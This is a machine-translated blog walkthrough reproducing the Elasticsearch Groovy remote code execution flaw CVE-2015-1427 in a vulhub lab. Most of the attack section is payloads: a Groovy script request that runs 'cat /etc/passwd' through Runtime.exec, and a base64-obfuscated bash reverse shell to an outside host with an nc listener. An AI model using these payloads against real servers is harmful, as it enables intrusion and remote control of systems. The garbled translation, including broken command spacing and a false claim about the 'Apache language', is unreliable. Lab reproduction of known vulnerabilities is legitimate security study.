Shulou(Shulou.com)05/31 Report--

This article is about how to analyze the recurrence of ElasticSearch Groovy remote code execution vulnerability CVE-2015-1427. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it.

Elasticsearch is a Lucene-based search server. It provides a full-text search engine with distributed multi-user capability, based on RESTful web interface. Developed in the Apache language and released as open source under the Apache license terms, Java is a popular enterprise search engine.

A remote code execution vulnerability (CVE-2014-3120) was exposed in 2014 because the script engine used by ElasticSearch supports script code MVEL for data manipulation as expressions, allowing attackers to execute arbitrary java code through MVEL constructs.

Later, the scripting language engine was replaced by Groovy, and sandboxie was added to control, so the dangerous code would be intercepted. As a result, sandboxie's lax restrictions led to remote code execution this time.

Impact range of vulnerabilities: Elasticsearch 1.3.0-1.3.7 | 1.4.0-1.4.2

This paper only records and implements the vulnerability recurrence, and the utilization process is as follows:

I. Construction of loophole environment

The vulnerability environment in this article is built with vulhub. Execute the following command to open the environment.

Cd / elasticsearch/CVE-2015-1427docker-compose builddocker-compose up-d

Access port 9200 after execution, which is shown as follows:

Vulnerability link: http://192.168.101.152:9200/

Second, the recurrence of loopholes

To exploit this vulnerability, first of all, at least one piece of data exists in ElasticSearch, and the following packets are sent to add data

POST / website/blog/ HTTP/1.1Host: 192.168.101.152:9200Content-Length: 21 {"name": "test"}

Return 201 to indicate that the addition is successful, and then send the following packet to execute the command

POST / _ search?pretty HTTP/1.1Host: 192.168.101.152:9200Content-Length: 410 {"size": 1 "script_fields": {"test#": {"script": "java.lang.Math.class.forName (\" java.io.BufferedReader\ ") .getConstructor (java.io.Reader.class) .newInstance (java.lang.Math.class.forName (\" java.io.InputStreamReader\ ") .getConstructor (java.io.InputStream.class) .newInstance (java.lang.Math.class.forName (\" java.lang.Runtime\ ") .getRuntime () .exec (\" cat / etc ") / passwd\ ") .getInputStream ()) .readLines ()" Lang: "groovy"}

Command executed successfully

To facilitate the bounce of shell to the server

Server executes nc-lvvp listening port

Then execute the following command to rebound shell

Bash-c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4NDEgMD4mMQ==} | {base64,-d} | {bash,-i}

Rebound successfully

The above is how to analyze the recurrence of ElasticSearch Groovy remote code execution vulnerability CVE-2015-1427. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.